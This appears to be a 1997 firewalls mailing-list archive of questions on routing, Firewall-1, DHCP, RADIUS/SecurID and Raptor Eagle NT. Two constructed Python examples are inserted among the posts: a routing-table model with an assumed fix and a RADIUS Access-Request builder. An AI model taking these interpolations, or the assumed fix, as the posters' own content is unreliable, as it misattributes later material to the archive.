}                |              |  W95 Client |  172.17.30.13 B S/net
}                |              |_____________|  Gateway 172.17.200.2
}                |
}                |
}       _________|_____________________
}      |     172.17.200.2              |
}      |       Cisco Router            |____________________  172.20.*.*
}      |       172.16.200.2            |                       (B Class)
}      |____________|__________________|
}                   |
}                   |
}       ____________|____________________________  172.16.*.* Network (B Class)
}                                 |
}                                 |
}                            _____|_______
}                           | W95 Client  |  172.16.30.11 (Gateway 172.16.200.2)
}                           |_____________|
} 
} Note this is a test implementation of our final IP addressing Plan.  Our
} registered IP C Class is used on the outside of the FireWall proxy server
} firewall 194.bbb.ccc.* and on the inside of the Firewall we use a 172.17.*.*
} B class network to our internal Router which also has other non-internet
} data feeds (eg 172.20.*.* above).  On the inside of this internal router we
} are planning to use the IP address 172.16.*.* B Class network.
} 
} Our problem is that clients on the 172.16.*.* network cannot ping (see) the
} firewall as its default router (gateway) is set as 194.bbb.ccc.1.  Also the
} clients on the 172.17.*.* network can see the internal network only when
} the gateway is set as the 172.17.200.2 interface of the Router.  Therefore
} it will not be able to see the Internet as all traffic is sent to the
} inside not the outside.  The other external connections work fine as they
} all refer to their Internal Router port as their default router (gateway).
} 
} Obviously I need to determine how to solve this so that the external
} traffic is directed to the Internet by the firewall and inside traffic
} correctly through the Router to the 172.16.*.* subnet.
} 
} Any Assistance would be appreciated
} 
} Thanks in Advance
} 
} AMF
} 
} 
} ==========================================================================
}  Andrew M Forster       [GMT +4]           Email: forster@emirates.net.ae
}  Phone: +9712 262556 or +9712 453613                  Fax:   +9712 465344
} ==========================================================================
} 

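As an added example that is not part of AMF's post, here is a small Python model of the routing tables the diagram implies. It shows why a ping from 172.16.30.11 reaches the firewall but the reply heads for 194.bbb.ccc.1, and what changes once the firewall has routes for 172.16.*.* and 172.20.*.* via 172.17.200.2 and the internal router defaults to 172.17.100.1. Those routes are the assumed remedy, not something the post states; the firewall's masked outside /24 is left out of the tables and 192.0.2.10 is a constructed Internet address.

```python
import ipaddress

# Addresses taken from the poster's diagram, mapped to the device owning them.
# "194.bbb.ccc.1" is the poster's masked notation for the Internet router.
ADDRS = {
    "172.16.30.11": "client16", "172.17.30.13": "client17",
    "172.16.200.2": "router", "172.17.200.2": "router",
    "172.17.100.1": "firewall", "194.bbb.ccc.1": "internet-router",
}
DIRECT = "direct"  # marker for a directly connected network

# Routing tables as the post describes them. The firewall's outside /24 is
# omitted because the poster masked it; its default route stands in for it.
AS_POSTED = {
    "client16": [("172.16.0.0/16", DIRECT), ("0.0.0.0/0", "172.16.200.2")],
    "client17": [("172.17.0.0/16", DIRECT), ("0.0.0.0/0", "172.17.200.2")],
    "router":   [("172.16.0.0/16", DIRECT), ("172.17.0.0/16", DIRECT),
                 ("172.20.0.0/16", DIRECT)],
    "firewall": [("172.17.0.0/16", DIRECT), ("0.0.0.0/0", "194.bbb.ccc.1")],
}
# Assumed fix (not in the post): the firewall learns the networks behind the
# internal router, and the router sends everything else to the firewall.
FIXED = dict(AS_POSTED)
FIXED["firewall"] = AS_POSTED["firewall"] + [("172.16.0.0/16", "172.17.200.2"),
                                            ("172.20.0.0/16", "172.17.200.2")]
FIXED["router"] = AS_POSTED["router"] + [("0.0.0.0/0", "172.17.100.1")]


def next_hop(table, dst):
    """Longest-prefix match over (prefix, hop) entries; None if no route."""
    addr, best = ipaddress.ip_address(dst), None
    for prefix, hop in table:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, hop)
    return best[1] if best else None


def trace(src, dst, tables, max_hops=8):
    """Devices visited from src towards dst. The path ends at the owner of dst,
    at a device with no table of its own (the Internet router), or 'no route'."""
    path, here = [src], src
    for _ in range(max_hops):
        if ADDRS.get(dst) == here or here not in tables:
            return path
        hop = next_hop(tables[here], dst)
        if hop is None:
            return path + ["no route"]
        here = ADDRS.get(dst, "?") if hop == DIRECT else ADDRS.get(hop, hop)
        path.append(here)
    return path + ["loop"]


def ping_ok(src, src_ip, dst_ip, tables):
    """A ping only succeeds if the request and the reply both arrive."""
    out, back = trace(src, dst_ip, tables), trace(ADDRS[dst_ip], src_ip, tables)
    return out[-1] == ADDRS[dst_ip] and back[-1] == src
```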

From owner-firewalls-outgoing  Tue Jun 10 10:48:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24359 for firewalls-outgoing; Tue, 10 Jun 1997 08:12:13 -0700 (PDT)
Received: from gov.on.ca (govonca.gov.on.ca [192.75.156.244]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA24228 for ; Tue, 10 Jun 1997 08:11:48 -0700 (PDT)
Received: from govonca2.gov.on.ca by gov.on.ca (5.65v3.2/Ultrix3.0-C)
	id AA14860; Tue, 10 Jun 1997 11:13:00 -0400
Received: from walkerj.gov.on.ca by govonca2.gov.on.ca; (8.7.5/1.1.8.2/03Nov94-0842PM)
	id LAA03243; Tue, 10 Jun 1997 11:13:35 -0400 (EDT)
Received: by walkerj.gov.on.ca with Microsoft Mail
	id <01BC758F.B1E85DE0@walkerj.gov.on.ca>; Tue, 10 Jun 1997 11:16:08 -0400
Message-Id: <01BC758F.B1E85DE0@walkerj.gov.on.ca>
From: James Walker 
To: "'firewalls@greatcircle.com'" 
Subject: FW1 Large Network Protection Question 
Date: Tue, 10 Jun 1997 11:16:02 -0400
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Anyone out there installed firewall-1 product to protect a large network
made up of multiple class C Networks ???? My telecom staff seem to
believe that the sparc 20 that we are intending to use will die upon
implementation as it was not designed to be a router.

Any Insights ???? 

From owner-firewalls-outgoing  Tue Jun 10 11:24:08 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA23113 for firewalls-outgoing; Tue, 10 Jun 1997 08:02:47 -0700 (PDT)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA23095 for ; Tue, 10 Jun 1997 08:02:40 -0700 (PDT)
Received: from big-dawgs.cisco.com (herndon-dhcp-107.cisco.com [171.68.53.107]) by diablo.cisco.com (8.8.5/CISCO.SERVER.1.2) with SMTP id IAA29405; Tue, 10 Jun 1997 08:03:17 -0700 (PDT)
Message-Id: <3.0.1.32.19970610110317.006c23fc@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0.1 (32)
Date: Tue, 10 Jun 1997 11:03:17 -0400
To: Basil McCrea 
From: Paul Ferguson 
Subject: Re: RFC for Ports
Cc: "'firewalls@greatcircle.com'" 
In-Reply-To: <01BC75AE.E2456810@pc00874.ina.de>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

RFC1700.

- paul

At 02:59 PM 06/10/97 +0200, Basil McCrea wrote:

>Hi,
>
>Maybe a dumb question, but can anyone tell me which RFC describes which
>port numbers correspond to which services.
>
>TIA
>
>Basil McCrea
>
>

--
Paul Ferguson                                           ||        ||
Consulting Engineering                                  ||        ||
Herndon, Virginia   USA                                ||||      ||||
tel: +1.703.397.5938                               ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com                         c i s c o S y s t e m s

From owner-firewalls-outgoing  Tue Jun 10 11:28:34 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA00870 for firewalls-outgoing; Mon, 9 Jun 1997 12:52:23 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA00844 for ; Mon, 9 Jun 1997 12:52:14 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id MAA22961 for ; Mon, 9 Jun 1997 12:56:23 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA06045; Mon, 9 Jun 97 12:54:11 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id MAA17402 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 12:53:02 -0700 (PDT)
Message-Id: <199706091953.MAA17402@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  DEEEAAC4BA582D42882564B1006DCEF1; Mon,  9 Jun 97 12:53:00 EDT
To: Donald Branch 
Cc: firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 12:59:42 EDT
Subject: Re: DHCP and firewall1
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What do you mean by "work with" ?

    Ryan

---------- Previous Message ----------
To: firewalls
cc: 
From: donaldb@ncmi-ny.com (Donald Branch) @ smtp
Date: 06/09/97 01:33:15 PM
Subject: DHCP and firewall1

Has anyone configured firewall 1 to work with DHCP?  Can someone tell
me how they went about this issue.

Donald Branch
Unix sysAdmin NationsBanc

P.S. Faith is finding answers in the heart





From owner-firewalls-outgoing  Tue Jun 10 11:31:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA21934 for firewalls-outgoing; Tue, 10 Jun 1997 07:56:41 -0700 (PDT)
Received: from dub-img-9.compuserve.com (dub-img-9.compuserve.com [149.174.206.139]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA21911 for ; Tue, 10 Jun 1997 07:56:32 -0700 (PDT)
Received: by dub-img-9.compuserve.com (8.6.10/5.950515)
	id KAA02471; Tue, 10 Jun 1997 10:57:27 -0400
Date: Tue, 10 Jun 1997 10:56:59 -0400
From: john madincea 
Subject: Handling multiple firewall connections
To: GreatCircle 
Message-ID: <199706101057_MC2-1831-417B@compuserve.com>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

It is my understanding that configuring more than 3 NIC's into a firewall
can be very complicated.  If this is true, then what is the solution for
multiple connections?  I've heard discussions about firewall farms and am
wondering if they are the answer.

Are there any legal or configuration (3 or more NICs) issues related to
doing the following.

    Vendor A       Vendor B       Vendor C                      ( etc.... )
            |                        |                         |
       Router           Router             Router
(or single router with multiple interfaces)
            |                        |                         |
            ---------------------------------------
                                                |
                                        Firewall
                                                |
                                         Router
                                                |
                                  Internal Network

If you can point me towards any URL's, manuals, or books discussing these
issues I would appreciate it.

TIA
John Madincea



From owner-firewalls-outgoing  Tue Jun 10 11:36:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA23586 for firewalls-outgoing; Tue, 10 Jun 1997 08:06:43 -0700 (PDT)
Received: from gatekeeper.bender.com (gatekeeper.bender.com [198.176.81.201]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA23579 for ; Tue, 10 Jun 1997 08:06:37 -0700 (PDT)
Received: by gatekeeper.bender.com; (5.65v3.2/1.3/10May95) id AA30363; Tue, 10 Jun 1997 11:07:33 -0400
Date: Tue, 10 Jun 1997 11:07:31 -0400
From: itjjw01@bender.com (John Waterbury)
Message-Id: <199706101507.LAA20398@albadm02.bender.com>
To: firewalls@greatcircle.com
Subject: Re: DHCP and Firewall 1
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


> From mike.jones@unifiedtech.com Tue Jun 10 10:15:22 1997
> Date: Tue, 10 Jun 1997 09:10:16 -0400
> From: Mike Jones 
> Mime-Version: 1.0
> To: Geoff Breach 
> Cc: firewalls@greatcircle.com
> Subject: Re: DHCP and Firewall 1
> X-Priority: 3 (Normal)
> 
> Geoff Breach wrote:
> > On Mon,  9 Jun 97 16:44:44 -0400, donaldb@ncmi-ny.com (Donald Branch)
> > wrote:
> > >I have a Windows NT machine running DHCP.  I want to be able from
> > >that one machine to be able to get out to AOL but since its IP
> > >address keeps changing  I can't make a rule based on his IP address.
> > >keeps changing

Here's the key to the question I believe that is of concern. The ip that's
changing is AOL's.


> > Only one way. Keep its IP address from changing. If you configure
> > your DHCP server to always hand out the same address to that
> > machine's MAC address, you get a middle ground between the benefits
> > of DHCP and the benefits of fixed addressing.
> 
> Not so. You can use user authentication on the outbound FTP
> session.
>  
> >  Yeah, there are other ways, authenticate, etc, but too much
> > trouble IMHO.
> 
> Too much trouble? For a single user? If it were for 50 users,
> then yeah, but for one it's no biggie.
> 
> As far as that goes, if you are using a reasonably large (say,
> a month or more) lease time on your DHCP server the IP address
> of the machine you're working on will never change unless you
> go off the network (e.g., don't turn the machine on) for over
> a month. So the idea of doing it by IP address isn't completely
> out of the question. DHCP doesn't have to be minute-by-minute
> dynamic in most environments to be useful.
> 
> --
> 	Mike Jones
> 	Sr. Technology Advisor
> 	UNIFIED Technologies

From owner-firewalls-outgoing  Tue Jun 10 12:38:02 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24003 for firewalls-outgoing; Tue, 10 Jun 1997 08:10:20 -0700 (PDT)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA19137 for ; Tue, 10 Jun 1997 07:43:49 -0700 (PDT)
Received: from uucp4.UU.NET by relay5.UU.NET with SMTP 
	(peer crosschecked as: uucp4.UU.NET [192.48.96.35])
	id QQctio28813; Tue, 10 Jun 1997 10:44:40 -0400 (EDT)
Received: from mop.UUCP by uucp4.UU.NET with UUCP/RMAIL
        ; Tue, 10 Jun 1997 10:44:40 -0400
Received: from mopphil.phil.mop.com by mtb.phil.mop.com (4.1/SMI-4.1)
	id AA17835; Tue, 10 Jun 97 10:24:12 EDT
Received: from neumann.phil.mop.com by mopphil.phil.mop.com (4.1/SMI-4.1)
	id AA01111; Tue, 10 Jun 97 10:24:01 EDT
From: cdonahue@neumann.mop.com
Received: from ccMail by neumann.phil.mop.com (ccMail Link to SMTP R6.0)
    id AA865952666; Tue, 10 Jun 97 10:24:29 -0500
Message-Id: <9706108659.AA865952666@neumann.phil.mop.com>
X-Mailer: ccMail Link to SMTP R6.0
Date: Tue, 10 Jun 97 10:24:39 -0500
To: 
Subject: USR Radius 
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


     Hi.  Please excuse the off topic question to follow but I feel this 
     group might be able to help me or point me in the right direction. 
     
     I am currently testbedding a USR netserver 16 (isdn and Async modems 
     support) that I would like to authenticate users via the USR Solaris 
     Radius server which in turn would talk to a SecurID ACE server.  (In 
     the testbed, the ace server and the radius server will be running on 
     the same sparc 2).  USR at this point has been less than helpful and 
     any help from this group would be very much appreciated.  My first 
     impression is that a passthrough user needs to be created in the 
     Radius database that will require an ace challenge.  At this point I'm 
     not even sure how the client will interact with the prompts.  It 
     looks like a Win/95 user running dial-up networking should "enable 
     terminal window" after the devices connect.  After that it appears 
     that the inet server will prompt for a username and passcode.  The 
     inetserver will then check its own user table for this user.  If it 
     does not find the usercode, it will pass the request on to the radius 
     server.  The radius server should then somehow pass the request on to 
     the ace server.  I'm now lost.  
     
     Specifically, I would like help configuring the radius server in terms 
     of creating a user that will go to an ace server authenticator.
     
     I will summarize if there appears to be any interest.  
     
     Thanks for your time.
     
     Craig Donahue
     Net Eng.
     BNP/CN
     cdonahue@mop.com
     610-995-1400

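The post describes a NAS that falls through its local user table to a RADIUS server, which would in turn hand off to the ACE server. As an added example (not from the post, the USR product, or any RADIUS implementation), here is the RADIUS leg of that chain in Python: the Access-Request a NAS sends, with the User-Password hiding of RFC 2865 section 5.2 (the same scheme as the RFC 2138 that was current in 1997), and the server-side parse that recovers it with the shared secret. The ACE hand-off the poster is stuck on is not modelled; the user name, password, secret and Request Authenticator are constructed values.

```python
import hashlib
import os
import struct

# RADIUS code and attribute types (RFC 2865 sections 3 and 5).
ACCESS_REQUEST = 1
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2


def _password_xor(data, secret, authenticator, decrypt):
    """Chained MD5 XOR from RFC 2865 5.2: block i is XORed with
    MD5(secret + previous ciphertext block); block 0 uses the Request
    Authenticator. Only which side of the XOR feeds the chain differs."""
    out, prev = bytearray(), authenticator
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        key = hashlib.md5(secret + prev).digest()
        result = bytes(a ^ b for a, b in zip(block, key))
        out += result
        prev = block if decrypt else result  # the ciphertext block either way
    return bytes(out)


def hide_password(password, secret, authenticator):
    """NAS side: NUL-pad to a multiple of 16 bytes (at least one block)."""
    padded = (password + b"\x00" * (-len(password) % 16)) or b"\x00" * 16
    return _password_xor(padded, secret, authenticator, decrypt=False)


def reveal_password(hidden, secret, authenticator):
    """Server side: undo the chain and strip the NUL padding."""
    return _password_xor(hidden, secret, authenticator, True).rstrip(b"\x00")


def _attr(attr_type, value):
    """One Type-Length-Value attribute; Length counts the two header bytes."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_access_request(identifier, user_name, password, secret, authenticator=None):
    """Header, 16-byte Request Authenticator, User-Name, hidden User-Password."""
    authenticator = authenticator or os.urandom(16)
    attrs = _attr(ATTR_USER_NAME, user_name)
    attrs += _attr(ATTR_USER_PASSWORD, hide_password(password, secret, authenticator))
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs))
    return header + authenticator + attrs


def parse_access_request(packet, secret):
    """Server side: check lengths, walk the TLVs, recover the password."""
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    if code != ACCESS_REQUEST or length != len(packet) or length < 20:
        raise ValueError("malformed Access-Request")
    authenticator, attrs, pos = packet[4:20], {}, 20
    while pos < length:
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2 or pos + attr_len > length:
            raise ValueError("bad attribute length")
        attrs[attr_type] = packet[pos + 2:pos + attr_len]
        pos += attr_len
    return {"identifier": identifier,
            "user_name": attrs.get(ATTR_USER_NAME, b"").decode(),
            "password": reveal_password(attrs[ATTR_USER_PASSWORD], secret, authenticator)}
```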


From owner-firewalls-outgoing  Tue Jun 10 13:04:50 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA20548 for firewalls-outgoing; Tue, 10 Jun 1997 11:01:03 -0700 (PDT)
Received: from [206.7.53.129] (external.digitalglobe.com [206.7.53.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA20430 for ; Tue, 10 Jun 1997 11:00:25 -0700 (PDT)
Received: from indyrb.digitalglobe.com by [206.7.53.129]
          via smtpd (for honor.greatcircle.com [198.102.244.44]) with SMTP; 10 Jun 1997 17:59:33 UT
Received: from groupwiseco.digitalglobe.com by indyrb.digitalglobe.com via SMTP (951211.SGI.8.6.12.PATCH1042/951211.SGI.AUTO)
	for  id MAA14428; Tue, 10 Jun 1997 12:00:56 -0600
Received: from ewico-Message_Server by groupwiseco.digitalglobe.com
	with Novell_GroupWise; Tue, 10 Jun 1997 12:00:52 -0600
Message-Id: 
X-Mailer: Novell GroupWise 4.1
Date: Tue, 10 Jun 1997 12:00:46 -0600
From: Stephen Holden 
To: firewalls@greatcircle.com
Subject: Eagle NT questions
Mime-Version: 1.0
Content-Type: text/plain
Content-Disposition: inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Howdy - I've got a question / comment about Raptor's eagle NT product.

We've set it up on a Compaq Proliant 2500r (single Ppro 200) with 3
Compaq Netflex NICs.  Actually we had a Raptor trained person come out
to our site to help with the EagleNT setup, since we're so swamped.
The problem we're having is that after about 16 hours of uptime, the fw
suddenly cuts off internal access to the router.  This happens every 16
hours without fail.  The only way we've been able to restore it is by
rebooting the server.  NT doesn't lock up, and there are no new events in
the event log.

We've spent a lot of time with Raptor support, and the best advice we
got was "This may be related to PCI bus mastering so disable it on your
computer."  Well you can't do that on a 2500r, so we went to EISA and
ISA NIC's and got the same lockup after 16 hours.  Raptor's other solution
was to use a desktop type computer instead of the Proliant, which
seems pretty hokey.

Has anyone else had a similar experience?

Steve Holden
Network Technician
sholden@digitalglobe.com

From owner-firewalls-outgoing  Tue Jun 10 13:11:18 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA00919 for firewalls-outgoing; Mon, 9 Jun 1997 12:52:42 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA00849 for ; Mon, 9 Jun 1997 12:52:15 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id MAA22981 for ; Mon, 9 Jun 1997 12:56:28 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA06083; Mon, 9 Jun 97 12:54:17 PDT
Received: (fro